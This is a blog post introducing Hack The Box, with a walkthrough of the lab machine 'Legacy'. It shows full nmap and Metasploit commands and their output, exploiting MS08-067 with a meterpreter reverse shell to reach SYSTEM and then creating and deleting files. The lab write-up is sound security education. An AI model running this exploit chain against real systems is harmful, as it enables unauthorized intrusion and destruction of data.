What the hec... no... Hack The Box?

-
If you have always wanted to break boxes but don't have a clue where to start, Hack The Box may be The Service(tm) for your weird tastes. And that's why I subscribed there. :)

It's basically a service which offers various virtual machines with various difficulty levels regarding hacking. The easiest ones are really easy, and the insane ones on the other side of the scale are just like that.

You can choose between free and paid versions. The biggest differences between these two plans are that only the paid one offers also the retired machines and virtual machines there have more resources available.

And you are not allowed to publish howtos or walkthroughs for the active machines. So if you want to learn faster(?) or more, you probably want to get the paid plan at least for first few moons. By doing that you can get help when you'll get stuck.

Yes, there are also other resources available but you can read more from their website.

But, now I wanted to show what it actually means to break in to some machine. There are really many ways to do this, but this is one method.

I'm using the Windows machine Legacy as an example, and this machine has difficulty level easy.

I have the VPN connection to the HTB infra up, and the box is found from

root@kali:~# ping 10.10.10.4
PING 10.10.10.4 (10.10.10.4) 56(84) bytes of data.
64 bytes from 10.10.10.4: icmp_seq=1 ttl=127 time=45.1 ms
64 bytes from 10.10.10.4: icmp_seq=2 ttl=127 time=44.9 ms
^C
--- 10.10.10.4 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 44.949/45.048/45.147/0.099 ms

First I'll do Nmap scan to find which ports are open in this machine. I'm not going to describe all commands in detailed way, but this Nmap scans all the ports and tries to find all the possible info from the ports it founds open. I'm using red color to highlight the important stuff.

root@kali:~# nmap -A -T4 -p- 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 13:54 EDT
Nmap scan report for 10.10.10.4
Host is up (0.045s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:2e:aa (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-07-18T22:54:14+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   48.00 ms 10.10.14.1
2   48.09 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.50 seconds


So, the hostname for this machine is LEGACY and there are ports 139 and 445 open, which means that there is most probably Windows fileshare available. We can also expect that this is the way to break into this box because no other ports are open.

For the actual hard work I'm using Metasploit, because it helps to demonstrate the way these things work. Metasploit has pros and cons, but it's quite heavily used system, and it offers awful lot of readily implemented scanners + exploits.

First we need to find which version the Windows fileshare actually is.

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     10.10.10.4       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > run

[+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So, it's Windows XP SP3 and the next step is to ask from Google how we should proceed. The first link sounds really promising, because it's from Rapid7 which is the company behind Metasploit. This should be quite simple machine to break into, because there is a module available in Metasploit to exploit this particular vulnerability.





msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
lhost => tun0
msf5 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.10.10.4       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Now the exploit has been configured, and we can run the exploit.

msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.26:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.26:4444 -> 10.10.10.4:1057) at 2020-07-13 14:11:08 -0400

So, we are now in! The exploit worked, it was able to open a shell connection to the machine and we can continue.


meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Holy cow! We are in as NT AUTHORITY\SYSTEM which is by default the account with highest permissions in Windows computers. So, we have access to everything in this machine.


meterpreter > shell
Process 1780 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\

16/03/2017  08:30 ��                 0 AUTOEXEC.BAT
16/03/2017  08:30 ��                 0 CONFIG.SYS
16/03/2017  09:07 ��    <DIR>          Documents and Settings
29/12/2017  11:41 ��    <DIR>          Program Files
18/07/2020  07:10 ��    <DIR>          WINDOWS
               2 File(s)              0 bytes
               3 Dir(s)   6.400.892.928 bytes free

C:\>echo jee > jee.txt
echo jee > jee.txt                                                                                                                                                                      
                                                                                                                                                                                        
C:\>del autoexec.bat
del autoexec.bat

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\

16/03/2017  08:30 ��                 0 CONFIG.SYS
16/03/2017  09:07 ��    <DIR>          Documents and Settings
18/07/2020  11:12 ��                 6 jee.txt
29/12/2017  11:41 ��    <DIR>          Program Files
18/07/2020  07:10 ��    <DIR>          WINDOWS
               2 File(s)              6 bytes
               3 Dir(s)   6.400.864.256 bytes free

C:\>type jee.txt
type jee.txt
jee


And that's it. There isn't anything else to show. Of course in the real world things are rarely as easy as with this machine, and this was a demonstration so you might assume (correctly) that at least some dead ends and wrong turns might have been skipped. Although this was quite easy one, so it didn't require much *head to wall* moves.

I might post some more examples and even walkthroughs in the future, who knows, so please stay tuned!

Ps. There is a really good reason why you should keep your computer stuff updated.... And the reason is that these remote code execution (RCE) type of vulnerabilities are patched quite quickly and this won't worked with newer Windows versions.

Comments

Post a Comment

Popular posts from this blog

The only constant is change

-
"I'm leaving next week. I'll change to company Y." This comment from my coworker caused quite many feelings and put my thoughts in motion. "Company Y.... Umm... I have heard it few times, and I know persons who have joined them, but I have no clue what they actually are doing. Let's see what their website shows. Oh. They seem to have an open position, which would be a direct match for me." At this point I had been in my position a little less than three years. Those years had been absolutely incredible, from the experience (and also CV...) point of view. When you are working in a global enterprise as the product security engineer/cyber security architect for a product line whose products are used globally in critical infra related use cases, it's quite unique place to gather experience and hopefully also knowledge & know-how.  There were multiple really interesting projects going on, which would give even more experience around how to secure 40 y...
Read more

Passion is a fruit

-
 "What if we educate them and they leave?"  "Well, what if we won't and they won't leave?" "Hi, there will be a big security conference in Helsinki next February. I'm going there. Can I use work hours for that or should I use my vacation days?" This is how I presented the trip to Disobey to my boss last autumn.  Disobey is quite a unique event, and presentations are not The Thing(tm) for this event, even though they are also awesome. Meeting people and discussions with them are among the reasons to go there.  This year the following presentations were nominated to my top list. Not all of them will be released on Youtube, but I can recommend any of those which will be released. Antti Kurittu: Story of Vastaamo (Keynote) Juho Jauhiainen: Losing My Mental Health in Cyber Security Jussi Eronen: Vulnerability Handling for the Masses Helinä Turunen: Cyber Comms 101 - What to Say When Cyber Hits the Fan (workshop) Lea Viljanen: Hacking the Audit Int...
Read more

Hack the Box, CTF, challenges, and ethical hacking (+ some thoughts about courses)

-
During last few years I've bought some Udemy courses when some person has suggested them. Mostly they are related to security and hacking, because that's the high level topic in ICT which interests me most. Yes, I've bought them. And hadn't started any. Until this summer. In the past if you wanted to learn some new skill in the ICT world, you usually attended some 3-5 day long course which normally costs some thousands of euros. Quite costly, too much information in short time span, and it required many days off from work + traveling. Then came the online courses. They cost less, you can follow the videos as you wish with your own schedule and you'll get community reviews for courses before buying them. I'm not fully sure but I suppose that the instructors get some amount of money for every attendee and no one wants to use their money (or time) to poorly made course. Thus every instructor has an incentive to make their course as good as just possible. At the mo...
Read more